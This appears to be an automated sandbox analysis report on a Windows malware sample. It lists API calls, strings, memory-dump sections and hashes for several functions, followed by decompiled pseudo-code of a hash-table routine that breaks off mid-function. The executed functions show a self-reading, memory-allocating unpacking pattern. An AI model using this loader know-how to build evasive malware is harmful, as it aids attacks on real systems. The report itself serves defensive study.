Instruction Fuzzy Hash: 7131C2617001145FCB0DED3E8AA53FA76D3AB8A320F31083EB907C3786FAAC9C545166

Uniqueness

Uniqueness Score: -1.00%

Function 004F06A6, Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 273filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004F0B92
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004F0BC9
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004F0C02
FindCloseChangeNotification.KERNEL32(?), ref: 004F0C1B

Strings

VirtualProtect, xrefs: 004F0A7B, 004F0A81
VirtualAlloc, xrefs: 004F0A64, 004F0A6A
GetFileSize, xrefs: 004F0AC3, 004F0AC9
GetModuleFileNameA, xrefs: 004F0A95, 004F0A98
ReadFile, xrefs: 004F0ADD, 004F0AE0
CreateFileA, xrefs: 004F0AA9, 004F0AAF
ExitProcess, xrefs: 004F0B25, 004F0B2B
GetLastError, xrefs: 004F0B0B, 004F0B11
CloseHandle, xrefs: 004F0AF4, 004F0AFA

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocChangeCloseCreateFindNotificationReadVirtual
String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
API String ID: 4254367219-3199432782
Opcode ID: de46ea9875921485470f909755d978c45d31f7fe8cfebc9436bb1b243c111556
Instruction ID: 53e90ede1152e8083f4c63b7d0b07705155045710ece14d3d7e949a43352b30f
Opcode Fuzzy Hash: de46ea9875921485470f909755d978c45d31f7fe8cfebc9436bb1b243c111556
Instruction Fuzzy Hash: C6F19D70D082E8DAEB22C764CC587DEBFB56B16705F0440C9D54C7A282D7BA1B98CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004F0C30, Relevance: 3.1, APIs: 2, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004F0C58
RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004F0CF3

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExitProcessUserVirtual
String ID:
API String ID: 2898551851-0
Opcode ID: cee1c8852a4d50c3f347e7c0e822d53421060937a67909dc9d3125fd25ffdbc5
Instruction ID: b3a206a74bff5881af6cb662472d614cb7462d352b3b9647ca6581fad5a59009
Opcode Fuzzy Hash: cee1c8852a4d50c3f347e7c0e822d53421060937a67909dc9d3125fd25ffdbc5
Instruction Fuzzy Hash: E221BDB2E40118AFDB64DBA5CC51FEEB379AB49304F0081D9F60DA7241DA355E808F95

Uniqueness

Uniqueness Score: -1.00%

Function 004F10D6, Relevance: 2.6, APIs: 2, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36583c4a6046d9d9c422884cccea6f3e03a7560dd5f633c24aa480165be7bfe5
Instruction ID: 11c18fdbf0e3d95e454b7b4b908e5bf5975ba7dcfaa33150e086ff9c469f5858
Opcode Fuzzy Hash: 36583c4a6046d9d9c422884cccea6f3e03a7560dd5f633c24aa480165be7bfe5
Instruction Fuzzy Hash: 5A11E774A0020DEFDB44CFA4D855BBE7BB4AB48701F104455E702BB390D3789980CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004F191D, Relevance: 1.6, APIs: 1, Instructions: 94libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNEL32(00000000,00000000,00000000), ref: 004F187D

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
Instruction ID: 16ee06b1829c03b3dd697a24eae5c454c9754015997dabe873b151cecc15fe7d
Opcode Fuzzy Hash: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
Instruction Fuzzy Hash: E141A3B4E0020ADFDB08CF89C890BBEB7B1BF48314F248559D516AB3A1C774A981CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004F1625, Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000000,?,?), ref: 004F1725

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
Instruction ID: 087bb1e7748ea6b24cade8ea33cd117296e498e2ee1ca957824a02e892e3b89f
Opcode Fuzzy Hash: 1f519fc31903773714423c04ace8a92900063527f879fb85026ab8a25b2e8cca
Instruction Fuzzy Hash: 1541D774A00219DFDB18CF88D590AADBBF2FB8C314F189259E50AAB354D734A982CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004F1699, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000000,?,?), ref: 004F1725

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b2120f7f6f7f518fc5e50730933e56edd7619c28a3430bbbeb1b1369b02a6b3a
Instruction ID: c8bd409ee2ea3a52b8a2efc2f15c7acd20b5740f4cfdd1b4fec9c6fb49be6d46
Opcode Fuzzy Hash: b2120f7f6f7f518fc5e50730933e56edd7619c28a3430bbbeb1b1369b02a6b3a
Instruction Fuzzy Hash: 7B118774A00208DFDB18DF88D491AAEBBB1FB8C315F249259E509AB355D734AC82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004F14C6, Relevance: 1.3, APIs: 1, Instructions: 88memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000065,00000000,00001000,00000004,?,004F120D,?,?), ref: 004F158A

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
Instruction ID: 89c5169b3ef4dea6abd1e2eba67d15f509fbf8145eeb67cd2976c7b26ed201af
Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
Instruction Fuzzy Hash: C841CEB4A00209DFCB04CF88C990EAEB7B1FF88304F208599E915AB355D734EE51CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004F11BC, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004F11C0

Memory Dump Source

Source File: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1c0b1751dc024361a7d43933b8471fea47c0e3c6f64c18f87a59994e9074a05b
Instruction ID: 275581fb25ade85fc359e4668eac72daf82cb05fb642c3ae314c6c0fb357aa04
Opcode Fuzzy Hash: 1c0b1751dc024361a7d43933b8471fea47c0e3c6f64c18f87a59994e9074a05b
Instruction Fuzzy Hash: BFC00278A01109EFCB44CF94C5948DDB7B1BF48200B108189E801A3340C634AA50CB60

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0046F4B0, Relevance: 30.6, APIs: 16, Strings: 1, Instructions: 847
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E0046F4B0(signed int __ebx, void* __edi) {
				void* __esi;
				signed int _t305;
				signed int _t307;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t317;
				signed int _t321;
				signed int _t333;
				signed int _t336;
				signed int _t341;
				signed int _t343;
				void* _t347;
				signed int _t352;
				intOrPtr* _t357;
				intOrPtr _t360;
				signed int _t363;
				signed int _t371;
				void* _t375;
				signed int _t382;
				signed int _t399;
				void* _t403;
				signed int _t410;
				signed int _t419;
				void* _t423;
				signed int _t430;
				signed int _t448;
				signed int _t450;
				signed int _t451;
				void* _t453;
				signed int _t454;
				signed int _t457;
				signed int _t465;
				signed int _t467;
				signed int _t468;
				void* _t470;
				signed int _t471;
				signed int _t474;
				signed int _t481;
				void* _t482;
				void* _t495;
				void* _t505;
				void* _t506;
				signed int _t509;
				void* _t510;
				void* _t511;
				void* _t517;
				unsigned int _t520;
				signed int _t522;
				void* _t535;
				unsigned int _t538;
				signed int _t540;
				intOrPtr* _t549;
				void* _t551;
				unsigned int _t554;
				signed int _t556;
				void* _t565;
				unsigned int _t568;
				signed int _t570;
				signed int _t582;
				intOrPtr* _t583;
				signed int _t584;
				signed int _t585;
				unsigned int _t587;
				intOrPtr _t588;
				intOrPtr* _t589;
				signed int _t596;
				intOrPtr* _t597;
				signed int _t598;
				signed int _t599;
				unsigned int _t601;
				intOrPtr _t602;
				intOrPtr* _t603;
				signed int _t612;
				signed int _t616;
				signed int _t621;
				signed int _t624;
				signed int _t630;
				signed int _t635;
				signed int _t637;
				signed int _t645;
				signed int _t650;
				signed int _t652;
				signed int _t660;
				void* _t662;
				intOrPtr* _t664;
				void* _t665;
				void* _t668;
				unsigned int _t670;
				signed int _t671;
				signed int _t672;
				void* _t675;
				unsigned int _t678;
				signed int _t681;
				signed int _t682;
				void* _t685;
				unsigned int _t687;
				signed int _t688;
				signed int _t689;
				void* _t692;
				unsigned int _t694;
				signed int _t695;
				signed int _t696;
				void* _t697;
				void* _t698;
				signed int _t700;
				signed int _t701;
				intOrPtr* _t703;
				signed int _t704;
				signed int _t705;
				signed int _t706;
				void* _t709;
				unsigned int _t711;
				signed int _t714;
				void* _t715;
				unsigned int _t716;
				void* _t718;
				unsigned int _t720;
				signed int _t721;
				void* _t722;
				intOrPtr _t724;
				unsigned int _t726;
				signed int _t729;
				void* _t730;
				unsigned int _t733;
				signed int _t736;
				void* _t737;
				signed int _t740;
				signed int _t742;
				intOrPtr _t745;
				void* _t747;
				signed int _t748;
				signed int _t749;
				void* _t751;

				_t480 = __ebx;
				_push(0xffffffff);
				_push(0x513070);
				_push( *[fs:0x0]);
				_t748 = _t747 - 0x20;
				_t305 =  *0x5596fc; // 0x9d48295
				 *(_t748 + 0x18) = _t305 ^ _t748;
				_push(__ebx);
				_push(__edi);
				_t307 =  *0x5596fc; // 0x9d48295
				_push(_t307 ^ _t748);
				 *[fs:0x0] = _t748 + 0x34;
				_t745 =  *((intOrPtr*)(_t748 + 0x44));
				 *(_t748 + 0x14) = 0;
				_t310 =  *(_t745 + 0x114);
				 *(_t748 + 0x18) = _t310;
				_t311 =  *(_t310 - 0xc);
				 *(_t748 + 0x14) = _t311;
				_t754 = _t311 -  *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2;
				if(_t311 <  *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2) {
					_t698 = _t745 + 0xa8;
					goto L3;
					do {
						L4:
						_t596 =  *_t596;
					} while (_t596 != _t645);
					L5:
					_t597 =  *((intOrPtr*)(_t698 + 4));
					 *(_t748 + 0x24) = _t465;
					if(_t465 !=  *_t597 || _t645 != _t597) {
						__eflags = _t465 - _t645;
						while(__eflags != 0) {
							_t742 =  *(_t748 + 0x24);
							 *(_t748 + 0x24) =  *_t742;
							_t650 =  *(_t742 + 8);
							_t468 = _t650;
							_t480 = _t468 + 1;
							do {
								_t598 =  *_t468;
								_t468 = _t468 + 1;
								__eflags = _t598;
							} while (_t598 != 0);
							_t470 = _t468 - _t480 + _t650;
							_t599 = 0x811c9dc5;
							__eflags = _t650 - _t470;
							while(_t650 != _t470) {
								_t480 =  *_t650 & 0x000000ff;
								_t650 = _t650 + 1;
								_t599 = _t599 * 0x01000193 ^ _t480;
								__eflags = _t650 - _t470;
							}
							_t471 = L004F2B82(_t599 & 0x7fffffff, 0x1f31d);
							_t748 = _t748 + 8;
							_t652 = _t650 * 0x41a7 - _t471 * 0xb14;
							__eflags = _t652;
							if(_t652 < 0) {
								_t652 = _t652 + 0x7fffffff;
								__eflags = _t652;
							}
							_t601 =  *(_t698 + 0x20);
							_t474 = _t601 & _t652;
							__eflags =  *((intOrPtr*)(_t698 + 0x24)) - _t474;
							if( *((intOrPtr*)(_t698 + 0x24)) <= _t474) {
								_t474 = _t474 + (_t652 | 0xffffffff) - (_t601 >> 1);
								__eflags = _t474;
							}
							_t602 =  *((intOrPtr*)(_t698 + 0x10));
							__eflags =  *((intOrPtr*)(_t602 + 4 + _t474 * 8)) - _t742;
							_t603 = _t602 + _t474 * 8;
							if( *((intOrPtr*)(_t602 + 4 + _t474 * 8)) != _t742) {
								__eflags =  *_t603 - _t742;
								if( *_t603 == _t742) {
									 *_t603 =  *_t742;
								}
							} else {
								__eflags =  *_t603 - _t742;
								if( *_t603 != _t742) {
									 *((intOrPtr*)(_t603 + 4)) =  *((intOrPtr*)(_t742 + 4));
								} else {
									 *_t603 =  *((intOrPtr*)(_t698 + 4));
									 *((intOrPtr*)( *((intOrPtr*)(_t698 + 0x10)) + 4 + _t474 * 8)) =  *((intOrPtr*)(_t698 + 4));
								}
							}
							__eflags = _t742 -  *((intOrPtr*)(_t698 + 4));
							if(_t742 !=  *((intOrPtr*)(_t698 + 4))) {
								 *((intOrPtr*)( *((intOrPtr*)(_t742 + 4)))) =  *_t742;
								_push(_t742);
								 *((intOrPtr*)( *_t742 + 4)) =  *((intOrPtr*)(_t742 + 4));
								L004EEDBE();
								_t748 = _t748 + 4;
								_t45 = _t698 + 8;
								 *_t45 =  *(_t698 + 8) - 1;
								__eflags =  *_t45;
							}
							__eflags =  *(_t748 + 0x24) -  *(_t748 + 0x20);
						}
					} else {
						L00480E50(_t480, _t698);
					}
					_t467 =  *(_t748 + 0x14) + 1;
					 *(_t748 + 0x14) = _t467;
					if(_t467 <  *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2) {
						_t311 =  *(_t748 + 0x14);
						L3:
						E004804B0( *(_t745 + 0x120) + _t311 * 4, _t748 + 0x1c, _t754, _t698, _t748 + 0x1c);
						_t465 =  *(_t748 + 0x1c);
						_t645 =  *(_t748 + 0x20);
						_t596 = _t465;
						if(_t465 != _t645) {
							goto L4;
						}
						goto L5;
					}
				}
				_t313 =  *( *(_t748 + 0x18) - 8);
				 *(_t748 + 0x24) = _t313;
				_t760 = _t313 -  *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2;
				if(_t313 <  *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2) {
					_t697 = _t745 + 0xd4;
					do {
						E004804B0( *(_t745 + 0x130) +  *(_t748 + 0x24) * 4, _t748 + 0x1c, _t760, _t697, _t748 + 0x1c);
						_t448 =  *(_t748 + 0x1c);
						_t630 =  *(_t748 + 0x20);
						_t582 = _t448;
						if(_t448 != _t630) {
							do {
								_t582 =  *_t582;
							} while (_t582 != _t630);
						}
						_t583 =  *((intOrPtr*)(_t697 + 4));
						 *(_t748 + 0x14) = _t448;
						if(_t448 !=  *_t583 || _t630 != _t583) {
							__eflags = _t448 - _t630;
							while(__eflags != 0) {
								_t740 =  *(_t748 + 0x14);
								 *(_t748 + 0x14) =  *_t740;
								_t635 =  *(_t740 + 8);
								_t451 = _t635;
								_t480 = _t451 + 1;
								do {
									_t584 =  *_t451;
									_t451 = _t451 + 1;
									__eflags = _t584;
								} while (_t584 != 0);
								_t453 = _t451 - _t480 + _t635;
								_t585 = 0x811c9dc5;
								__eflags = _t635 - _t453;
								while(_t635 != _t453) {
									_t480 =  *_t635 & 0x000000ff;
									_t635 = _t635 + 1;
									_t585 = _t585 * 0x01000193 ^ _t480;
									__eflags = _t635 - _t453;
								}
								_t454 = L004F2B82(_t585 & 0x7fffffff, 0x1f31d);
								_t748 = _t748 + 8;
								_t637 = _t635 * 0x41a7 - _t454 * 0xb14;
								__eflags = _t637;
								if(_t637 < 0) {
									_t637 = _t637 + 0x7fffffff;
									__eflags = _t637;
								}
								_t587 =  *(_t697 + 0x20);
								_t457 = _t587 & _t637;
								__eflags =  *((intOrPtr*)(_t697 + 0x24)) - _t457;
								if( *((intOrPtr*)(_t697 + 0x24)) <= _t457) {
									_t457 = _t457 + (_t637 | 0xffffffff) - (_t587 >> 1);
									__eflags = _t457;
								}
								_t588 =  *((intOrPtr*)(_t697 + 0x10));
								__eflags =  *((intOrPtr*)(_t588 + 4 + _t457 * 8)) - _t740;
								_t589 = _t588 + _t457 * 8;
								if( *((intOrPtr*)(_t588 + 4 + _t457 * 8)) != _t740) {
									__eflags =  *_t589 - _t740;
									if( *_t589 == _t740) {
										 *_t589 =  *_t740;
									}
								} else {
									__eflags =  *_t589 - _t740;
									if( *_t589 != _t740) {
										 *((intOrPtr*)(_t589 + 4)) =  *((intOrPtr*)(_t740 + 4));
									} else {
										 *_t589 =  *((intOrPtr*)(_t697 + 4));
										 *((intOrPtr*)( *((intOrPtr*)(_t697 + 0x10)) + 4 + _t457 * 8)) =  *((intOrPtr*)(_t697 + 4));
									}
								}
								__eflags = _t740 -  *((intOrPtr*)(_t697 + 4));
								if(_t740 !=  *((intOrPtr*)(_t697 + 4))) {
									 *((intOrPtr*)( *((intOrPtr*)(_t740 + 4)))) =  *_t740;
									_push(_t740);
									 *((intOrPtr*)( *_t740 + 4)) =  *((intOrPtr*)(_t740 + 4));
									L004EEDBE();
									_t748 = _t748 + 4;
									_t92 = _t697 + 8;
									 *_t92 =  *(_t697 + 8) - 1;
									__eflags =  *_t92;
								}
								__eflags =  *(_t748 + 0x14) -  *(_t748 + 0x20);
							}
						} else {
							L00480E50(_t480, _t697);
						}
						_t450 =  *(_t748 + 0x24) + 1;
						 *(_t748 + 0x24) = _t450;
					} while (_t450 <  *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2);
				}
				_t660 =  *( *(_t748 + 0x18) - 4);
				if(_t660 <  *((intOrPtr*)(_t745 + 0x144)) -  *((intOrPtr*)(_t745 + 0x140)) >> 3) {
					_t495 = _t745 + 0x100;
					do {
						E004811C0( *((intOrPtr*)(_t745 + 0x140)) + _t660 * 8, _t495, _t748 + 0x1c);
						E00480650(_t495, _t748 + 0x1c,  *(_t748 + 0x1c),  *(_t748 + 0x20));
						_t660 = _t660 + 1;
					} while (_t660 <  *((intOrPtr*)(_t745 + 0x144)) -  *((intOrPtr*)(_t745 + 0x140)) >> 3);
				}
				_t505 =  *(_t745 + 0x124);
				_t700 =  *(_t745 + 0x120);
				_t610 =  *( *(_t748 + 0x18) - 0xc);
				_t317 = _t505 - _t700 >> 2;
				 *(_t748 + 0x14) = _t610;
				if(_t317 <= _t610) {
					if(__eflags >= 0) {
						goto L81;
					} else {
						_t565 = _t610 - _t317;
						__eflags = 0x3fffffff - _t565 - _t317;
						if(0x3fffffff - _t565 < _t317) {
							_t317 = E004EE38E("vector<T> too long");
						}
						_t419 = _t317 + _t565;
						_t568 =  *((intOrPtr*)(_t745 + 0x128)) - _t700 >> 2;
						__eflags = _t419 - _t568;
						if(_t419 <= _t568) {
							L78:
							_t692 =  *(_t745 + 0x124);
							_t570 = _t610 - (_t692 -  *(_t745 + 0x120) >> 2);
							__eflags = _t570;
							if(_t570 != 0) {
								__eflags = 0;
								memset(_t692, 0, _t570 << 2);
								_t748 = _t748 + 0xc;
							}
							_t423 =  *(_t745 + 0x124);
							_t624 = _t610 - (_t423 -  *(_t745 + 0x120) >> 2);
							__eflags = _t624;
							 *(_t745 + 0x124) = _t423 + _t624 * 4;
							goto L81;
						} else {
							_t694 = _t568;
							_t733 = _t694 >> 1;
							__eflags = 0x3fffffff - _t733 - _t694;
							if(0x3fffffff - _t733 >= _t694) {
								_t695 = _t694 + _t733;
								__eflags = _t695;
							} else {
								_t695 = 0;
							}
							__eflags = _t695 - _t419;
							if(_t695 < _t419) {
								_t695 = _t419;
							}
							__eflags = _t695 - 0x3fffffff;
							if(_t695 > 0x3fffffff) {
								E004EE38E("vector<T> too long");
							}
							__eflags = _t568 - _t695;
							if(_t568 >= _t695) {
								goto L78;
							} else {
								_t494 = 0;
								__eflags = _t695;
								if(__eflags == 0) {
									L75:
									E004EF0C0(_t494,  *(_t745 + 0x120), ( *(_t745 + 0x124) -  *(_t745 + 0x120) >> 2) * 4);
									_t430 =  *(_t745 + 0x120);
									_t748 = _t748 + 0xc;
									_t736 =  *(_t745 + 0x124) - _t430 >> 2;
									__eflags = _t430;
									if(_t430 != 0) {
										_push(_t430);
										L004EEDBE();
										_t748 = _t748 + 4;
									}
									_t610 =  *(_t748 + 0x14);
									 *((intOrPtr*)(_t745 + 0x128)) = _t494 + _t695 * 4;
									 *(_t745 + 0x124) = _t494 + _t736 * 4;
									 *(_t745 + 0x120) = _t494;
									goto L78;
								} else {
									_push(_t695 * 4);
									_t494 = L004EF8DA(0, _t568, _t610, _t695, _t733, __eflags);
									_t748 = _t748 + 4;
									__eflags = _t494;
									if(_t494 == 0) {
										 *(_t748 + 0x20) = 0;
										 *(_t748 + 0x1c) = 0x52fd98;
										_t701 = _t748 + 0x1c;
										 *((intOrPtr*)(_t748 + 0x3c)) = 1;
										_t321 = E00404190(_t701);
										goto L85;
									} else {
										goto L75;
									}
								}
							}
						}
					}
				} else {
					_t737 = _t700 + _t610 * 4;
					if(_t737 != _t505) {
						_t696 = (_t505 - _t505 >> 2) * 4;
						E004EF0C0(_t737, _t505, _t696);
						_t748 = _t748 + 0xc;
						 *(_t745 + 0x124) = _t737 + _t696;
					}
					L81:
					_t610 =  *( *(_t748 + 0x18) - 8);
					_t506 =  *(_t745 + 0x134);
					_t701 =  *(_t745 + 0x130);
					_t321 = _t506 - _t701 >> 2;
					 *(_t748 + 0x14) = _t610;
					if(_t321 <= _t610) {
						L85:
						if(__eflags >= 0) {
							goto L105;
						} else {
							_t551 = _t610 - _t321;
							__eflags = 0x3fffffff - _t551 - _t321;
							if(0x3fffffff - _t551 < _t321) {
								_t321 = E004EE38E("vector<T> too long");
							}
							_t399 = _t321 + _t551;
							_t554 =  *((intOrPtr*)(_t745 + 0x138)) - _t701 >> 2;
							__eflags = _t399 - _t554;
							if(_t399 <= _t554) {
								L102:
								_t685 =  *(_t745 + 0x134);
								_t556 = _t610 - (_t685 -  *(_t745 + 0x130) >> 2);
								__eflags = _t556;
								if(_t556 != 0) {
									__eflags = 0;
									memset(_t685, 0, _t556 << 2);
									_t748 = _t748 + 0xc;
								}
								_t403 =  *(_t745 + 0x134);
								_t621 = _t610 - (_t403 -  *(_t745 + 0x130) >> 2);
								__eflags = _t621;
								 *(_t745 + 0x134) = _t403 + _t621 * 4;
								goto L105;
							} else {
								_t687 = _t554;
								_t726 = _t687 >> 1;
								__eflags = 0x3fffffff - _t726 - _t687;
								if(0x3fffffff - _t726 >= _t687) {
									_t688 = _t687 + _t726;
									__eflags = _t688;
								} else {
									_t688 = 0;
								}
								__eflags = _t688 - _t399;
								if(_t688 < _t399) {
									_t688 = _t399;
								}
								__eflags = _t688 - 0x3fffffff;
								if(_t688 > 0x3fffffff) {
									E004EE38E("vector<T> too long");
								}
								__eflags = _t554 - _t688;
								if(_t554 >= _t688) {
									goto L102;
								} else {
									__eflags = _t688;
									if(__eflags == 0) {
										L99:
										E004EF0C0(0,  *(_t745 + 0x130), ( *(_t745 + 0x134) -  *(_t745 + 0x130) >> 2) * 4);
										_t410 =  *(_t745 + 0x130);
										_t748 = _t748 + 0xc;
										_t729 =  *(_t745 + 0x134) - _t410 >> 2;
										__eflags = _t410;
										if(_t410 != 0) {
											_push(_t410);
											L004EEDBE();
											_t748 = _t748 + 4;
										}
										_t610 =  *(_t748 + 0x14);
										 *((intOrPtr*)(_t745 + 0x138)) = 0 + _t688 * 4;
										 *(_t745 + 0x134) = 0 + _t729 * 4;
										 *(_t745 + 0x130) = 0;
										goto L102;
									} else {
										_push(_t688 * 4);
										_t481 = L004EF8DA(0, _t688 * 4, _t610, _t688, _t726, __eflags);
										_t749 = _t748 + 4;
										__eflags = _t481;
										if(_t481 == 0) {
											 *(_t749 + 0x20) = 0;
											 *(_t749 + 0x1c) = 0x52fd98;
											_t705 = _t749 + 0x1c;
											 *((intOrPtr*)(_t749 + 0x3c)) = 2;
											_t333 = E00404190(_t705);
											goto L119;
										} else {
											goto L99;
										}
									}
								}
							}
						}
					} else {
						_t730 = _t701 + _t610 * 4;
						if(_t730 != _t506) {
							_t689 = (_t506 - _t506 >> 2) * 4;
							E004EF0C0(_t730, _t506, _t689);
							_t748 = _t748 + 0xc;
							 *(_t745 + 0x134) = _t730 + _t689;
						}
						L105:
						_t481 =  *(_t748 + 0x18);
						L0047FD50( *((intOrPtr*)(_t481 - 4)), _t745 + 0x140);
